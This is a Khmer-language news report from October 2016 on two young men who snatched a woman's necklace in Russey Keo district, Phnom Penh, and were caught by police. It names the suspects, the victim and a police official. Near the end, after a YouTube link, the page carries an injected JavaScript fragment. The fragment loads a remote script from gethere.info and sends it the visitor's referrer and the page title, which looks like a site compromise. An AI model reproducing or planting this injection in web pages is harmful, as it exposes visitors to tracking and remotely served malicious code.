Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ឆក់ខ្សែក បានសម្រេចហើយតែគេចចេញពីខណ្ឌឬស្សីកែវមិនរួច ត្រូវសមត្ថកិច្ចឃាត់បានទាំងគូ

ភ្នំពេញ៖ ជនសង្ស័យចំនួន២នាក់ ក្រោយពីជិះម៉ូតូធ្វើសកម្មភាពឆក់ខ្សែកពីស្ត្រីម្នាក់បានសម្រេចនៅចំនុចមុខបុរីពិភពថ្មី ក្នុងសង្កាត់គីឡូម៉ែត្រលេខ៦ ត្រូវបានកម្លាំងនគរបាលខណ្ឌឬស្សីកែវ បង្ក្រាបបានភ្លាមៗ កាលពីវេលាម៉ោង២និង៣០នាទីរសៀលថ្ងៃទី២៨ខែតុលាឆ្នាំ២០១៦នេះនៅចំនុច មុខកុងស៊ីកាប់ជ្រូកស្ថិតក្នុងភូមិក្រោលគោ សង្កាត់គីឡូម៉ែត្រលេខ៦ ខណ្ឌឬស្សីកែវ។

 

 

បើតាមភ្នាក់ងារយើងបានអោយដឹងថាជនសង្ស័យទី១មានឈ្មោះសុស សុភ័ក្រ ភេទប្រុស អាយុ១៨ឆ្នាំ និងទី២ឈ្មោះ ឡេះ សាវី ភេទប្រុស អាយុ១៩ឆ្នាំ ទាំង២នាក់ស្នាក់នៅក្នុងសង្កាត់ច្រាំងចំរេះ១ ខណ្ឌឬស្សីកែវ។ចំនែកជនរងគ្រោះមានឈ្មោះ គុង សំបូរ អាយុ៥៣ឆ្នាំ មុខរបរនៅផ្ទះ ស្នាក់ភូមិស្ពានខ្ពស់ ក្រុម១៤ សង្កាត់គីឡូម៉ែត្រលេខ៦ ខណ្ឌឬស្សីកែវ។
លោក ណយ ច័ន្ទណារ័ត្ន មន្ត្រីព្រហ្មទណ្ឌនគរបាលខណ្ឌឬស្សីកែវបានអោយដឹងថា ក្នុងការបង្ក្រាបករណីខាងលើនេះសមត្ថកិច្ចបានដកហូតបានវត្ថុតាងខ្សែក ផ្លាកទីនទំងន់៣ជីមកវិញ ហើយធ្វើការប្រគល់ជូនជនរងគ្រោះវិញ មិនតែប៉ុណ្ណោះបានដកហូតម៉ូតូម៉ាកស្មាសវី មួយគ្រឿងស្លាកលេខភ្នំពេញ1DE-0357 របស់ជនសង្ស័យដែលធ្វើសកម្មភាពមករក្សារទុកផងដែរ។

 

បច្ចុប្បន្នជនសង្ស័យខាងលើត្រូវបានបញ្ជូនទៅកាន់អធិកាដ្ឋាននគរបាលខណ្ឌឬស្សីកែវ ដើម្បីធ្វើការសាកសួរនិងចាត់ការទៅតាមផ្លូវច្បាប់។

https://youtu.be/iJ3TRMbe1xQs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More